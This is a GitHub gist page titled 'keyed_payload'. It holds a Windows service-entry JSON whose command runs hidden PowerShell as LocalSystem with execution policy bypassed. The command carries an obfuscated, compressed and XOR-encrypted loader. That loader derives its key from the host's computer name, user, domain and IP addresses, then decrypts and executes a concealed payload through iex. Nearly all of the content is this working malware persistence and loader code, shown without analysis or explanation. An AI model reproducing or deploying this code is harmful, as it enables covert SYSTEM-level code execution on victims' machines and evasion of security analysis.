Skip to content

Instantly share code, notes, and snippets.

@jdferrell3

jdferrell3/service#entry.json Secret

Created September 16, 2019 01:31
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save jdferrell3/26b3023e845f64117b287c3df0afcef4 to your computer and use it in GitHub Desktop.
Save jdferrell3/26b3023e845f64117b287c3df0afcef4 to your computer and use it in GitHub Desktop.
Download ZIP
keyed_payload
Raw
service#entry.json
{
"display_name": "CxPeyAYSmEobMGPQ",
"name": "LjyLgJoB",
"path_name": "%COMSPEC% /C start %COMSPEC% /C powershell.exe -NoE -NoP -NonI -ExecutionPolicy Bypass -C \"iex ('''789cbd588f73d3c8154ec811c092ce5a0b29d65a961937ed71244c2030b90b0e692d59248194c8f2dadad49677121aae97a633694085bbc9c1bfdeb75ac9961d73c7319d0e43ac1f6fdfbe7def7bdf7b4ffac6119399b13fd7bed65ed85f68cf1d5ca78dfe91ea4ac841cfafc5fab754f10abe76ae456a00923a6a6951ac6fb9d897c8caa142eceef8e95ddff03687cab1c1ca11fe50ede3806be9b342a435fa3f3e78f5f8ed9fe0fe60eff97c1c1698e5194384be192a6f163d7caeb8f1f3f8c876ed416cc6a76bbee297884414736d285389aa0c7699efa0751f756d4f7517b9de13a585cb75b4ccd79fd6cf98fe745722dbae52fdc4fab95f590fabc1929ff16e5c8e43d50d75433e2830dd404124a17e6a61fb17cccade126aa13e25b8d7f8aa91bd59d68d33ee87d482d33eada3a07363a8a0fe8faafb982c36ae351422b51436928127660b05896dffc15e70a40cadf34a5721b2f3c59e38965cf03d9c657d586969a4d3584ef4600fbbe191ea1889c71df4b2ca2e6d56f1a5a1b2cbad5e710ba477c64e573d85a25e1df5b92da4d2520878435fdd953d3cd8766452ea685cfe74bb598cd5814dd199276db514173349dcd7be27d2b9ece0413532886cf6d042e3ee2176b1f5a0a313cb63cf997ea7f67da476ec28d3b7e55b871805e7a8cbdf3d1a5a3e3f63fbb818195e68fce15fb4bc6cbd3c6bbffdba6547b2498f171d89946a9548337ae85aa3ff77e4d821fe687bc60ebec4ded2b0e2f0134ddadc06ffaeec164968ac53cb551d35946a7729baf6d7da3d26fb2679087bde22eb443a54bbb2d16bf4415e78f03bf0b246b8c61992fcb4624f934eada0d56517871a49305eab52d485b8849a5f76ea881e153a1ab5aaec58026d96d111195205ff2756b75f8d576ef95a042b2f54768b20fec4a94bde39daeda03f9bcb8e8876af2af24fd8bde6aac176b7e26247e6c898e11fee0d7182d08013e470f7ffb03afc889f052937642b0b4ca225d27e8f00a76a7395283b46809df64f80d10883de1ef7f4c962139b70d65359a0b49c5a506688a1587f4c14b6bf308e178f8dda2d445868a96db05bc3db244c3cc5ede88bb765f09a576aae790a78eb21b99921156c81678dfec806d0f9059687ba34281e492ed8fa33760171e24d3976b15770119a8ad8152b9753bcdf6f811f07fc14c004c3e231766f518bc83571defbc43c1b5bdac9e56faf1cef8fb9167c62358846ca9cbb211ff23cf3a025350b224b4ef9df7ab99e670f94679fde599cc82c9fd5a15664321c6ff9e80a8970be57ee7c4ad31ce3bbf0c89ec5fafd841ff92ace31df0e8d6ebd01d111cc02ba97cf8bcdc6b0e41b0cd074517015c096b88ff5c62e4a796771328e99ff8819e1846bdb99dc47b0c7a4296a7137f30b05c6cb78e369cb882a842323b5a2d62026450476f34bd4ca3499fd7891656b3a68f9ea9e6f4b54aa4d693db70029323028c416f614ec91db31d3fea640b52e76db310e0d8661277b6004423a3436d83a29018b8b7b0a4c60fa9a03f8d2b91f73da04da27752519452f17631ce19eed25f790d7f442f365a783d65ac0e24107ad123bc2dd0eda6632dd8a6c47aeb2f382a72652749cff97850878c197bdcc9375b0620b725f720b01549a74efa4de8c6d4b3d9a938398ac1c178945ede82154be0efa8e56c8d3dd555aae32c141c64c1f5fd89106bc009a76a01ec113eedb558fd739a5cb736284d39976b58fb1b73128467800ab931ab419d93da838698e2715d72f930aaf0f82497ff54419c38a8c063f19993f73e7816c598d54af83d22e8bb3eaab8419782c209aa3eaef4ceffa7becbdeb1a1ed4e024c3276d4dfb389ef55798e2214910ea2bbb9bd0a7c8bcdbf9c17025a8c3db91266a06208b4be66bce6de0611c4127d9d52296979f5c9d612ed5906725f6eff014780e58b30ee882ab338837306c76d743a3f71049d14d7879dd9c2b7e8337d77dc559f2354008ec9ed9f24e7537d38e6c6d68f015e69513434cf21d71663744e7027a61c8a125f068e5737c93979f5cfd05be815a75e52a9548fcc4ccec1def12b461d5d7a4a91efef4376adaa5edca877604dc0b352bb309bafd7729668e54ca578413b3013f39607ad6e9ca33e7854f78ee71de73af6d2a41ac5621db3522787ea6aedfe5c7145539ffcc9e66fe67c89a718ad45b33de8c71969b1a2ed4e6a2b532bcc74a22d32ff1e08b2787141dbccf2da5ba524bbf649afa9c696ce1d396d479df3ab07bb80bfced4aef51f75393ccfe2726191e499802e87522e63966f6293f3d9fdc98a579e2dd788efbfca8265ccacf68663642054eb1dfe1daf1c887d0292bde06ab5427e642ceb3fb3135c72c26798ef1026620f2357a518608429ea8cf9806b630c01e026fededdc604df519d4ae431c696a042898c5d07dcf6a6ec1e485bc99ddea47ecb58fd5e036919cf6c9d691908c4f945dd853b78688a5f3fa484b1b3a7804e80bf58d235e415557e2d65fd89e7538e28bbc56f1fbf646809b3cca755e33889254c83bb5277b162926f341f4567155776b582151c30821365cc6c27f617307f37b733c1ea2623d711598a0198a3eaa28b58f6327505b5a9775302af91502bf81dd9209f396e0bfed968904cfad43e86f901df0690d6656986a0a0eee322a69f16b854a24786dbb08f28b695b8738b88dec1d9b6a7e956a54da6543134930933efae9c1f18a06e725d051f178e9d8559228bd9c3f98dbe79112ba92d3c014a2ad0e01e5873c6655a80db7b97e3f89109286897dc6963885c106492dafb2a6025cc3bbd64daa909b30373138f1f60f8ccfa8cf6c175fb1b7416590c7c8f018640fd78a9042341f58f89039966b34a5c4e61b5442c11c5ce9302f117b90644750bcd028f40b7c9e3a96808d4b26f05dd3ded586769767c4d3963935e970e42e9f316bdb2db74a80894754f6d8f5587f08130ad729b4c3f4e757cc694d1d745065d77b8d24a7f5a2bf18a97ee598637dcca34fa994cc890ae40f64c2890ab2fb0b615efa4d2134ab30754cf631da9a904032ecc62c965fa1c5596ee949c6046a37d1c2d19dafe8d9bc35cec47f42cd838ab0ee4b87707769ef89aa30610f22e8394c9f077b808379965cedc315ff7d01567e1197384b448b2cc88891df4eb9e7ebf337de6c96e3cfafcd095ac469c2c9b3573963e7735b20414c908082090b5606c5c9394ab03a0ace955e81779cbf188e84f2f14e3c7ed6ef809c735f7414f3f1eb250ad3f8042e985506f6adc2d9648e199e456225c31e4c18c07189d434b2a6adabe674c0b53442f6b6c8643e638f2510e1df2889748e9c9b44e13104069d75e2f1d74836e9bd935293e9df7cb8fff3937fc433eaee9434baaafbf9a4b744567f2878c59684a25738c0c0541594a2accadc0203b64206633e63f819e439ef9db4589792be6afc9d23df6d012e76d4bfe151afe7497f04e425689ac6c234e2e7c7dda358d513cc2cf615df1650009c3a2df5d55456aeb612c60b0b11f06e90f47dddd47aa85b93b2ebbc27682afc2f9289ecf09a6e25e7a924350e47329962592ded5713cd5cfea62f23d337920915ef195ebbd6d652f65be0ecc79f011e9da4e798d5258ebeb9e43dcb7379f39df8977a82eb042cc9b027f7c3c1de010af8f7dd2bcf77e6a72b587482dd1245c994965517b11b7b663b0c26519b95214fee9e6f9cdc39d9b87cf2e1de09af03c9fdbbedf78fde3690f87a8cbbbd2ae33bd6dab5a8c1cfc6acfd04cb099bd7b622d5c19cd3d37ba816cdf4493ef387329ff772593392fb2fc5283d1d'''+([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('fCV7JGRzemF5PSRffQpbQnl0ZVtdXSRrcW1vZj1AKCk7KDAuLigkZHN6YXkuTGVuZ3RoLzItMSkpfCV7JGtxbW9mKz1bY2hhcl1bYnl0ZV0oJzB4JyskZHN6YXkuU3Vic3RyaW5nKDIqJF8sMikpfQoKc2FsIE5KIE5ldy1PYmplY3QKJGpnZm52ID0gTkogSU8uTWVtb3J5U3RyZWFtKCwka3Ftb2YpCiRqZ2Zudi5SZWFkQnl0ZSgpfE91dC1OdWxsOyRqZ2Zudi5SZWFkQnl0ZSgpfE91dC1OdWxsCiRkPShOSiBJTy5Db21wcmVzc2lvbi5EZWZsYXRlU3RyZWFtKCRqZ2ZudixbSU8uQ29tcHJlc3Npb24uQ29tcHJlc3Npb25Nb2RlXTo6RGVjb21wcmVzcykpCiRiYnVmPU5KIEJ5dGVbXSA4MTkyCiRibGVuID0gJGQuUmVhZCgkYmJ1ZiwgMCwgODE5MikKCiRrbD0oJGVudjpDT01QVVRFUk5BTUUsJGVudjpVU0VSTkFNRSwkZW52OlVTRVJET01BSU4pCkAoKEdldC1XbWlPYmplY3QgLUNsYXNzIFdpbjMyX05ldHdvcmtBZGFwdGVyQ29uZmlndXJhdGlvbiAtRmlsdGVyICdpcGVuYWJsZWQ9Jyd0cnVlJycnKS5JUEFkZHJlc3MpfCV7JGtsKz0kX30KJGtsfCV7CiBbVWludDE2XSRrMTYgPSAwOyAKIFtCeXRlW11dJHNiYSA9IChOSiBUZXh0LlV0ZjhFbmNvZGluZykuR2V0Qnl0ZXMoJF8uVG9Mb3dlcigpKQogZm9yZWFjaCAoJHNiIGluICRzYmEpIHsgJGsxNj0oJGsxNiAtYmFuZCAweDBGRkYpKjE2KyRzYiB9CgogW2J5dGVbXV0kYmsgPSBAKFtieXRlXSgkazE2IC1iYW5kIDB4RkYpLCBbYnl0ZV0oKCRrMTYgLWJhbmQgMHhGRjAwKSAvIDB4MTAwKSkKIFtVaW50MzJdJGNzMzIgPSAwOwogJGJhID0gTkogYnl0ZVtdICRibGVuCiBmb3IgKCRpID0gMDsgJGkgLWx0ICRibGVuOyAkaSsrKSB7CiAgICRiYVskaV0gPSBbYnl0ZV0kYmJ1ZlskaV0gLWJ4b3IgJGJrWyRpICUgMl0KICAgJGNzMzIgPSAoJGNzMzIgLWJhbmQgMHg3RkZGRkZGKSArICRiYVskaV0gKyAweEMwMDAxCiB9CiBpZiAoKCRjczMyIC1ieG9yICRrMTYpIC1lcSAweDAwQzgyNEJBKSB7CiAgICRjYyA9IFtUZXh0LkVuY29kaW5nXTo6VXRmOC5HZXRTdHJpbmcoJGJhKQogICBpZXggJGNjCiAgIGV4aXQKIH0KfQonQmFkIGtleSc=')))); exit\"\n",
"service_type": "Own Process",
"start_name": "LocalSystem"
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment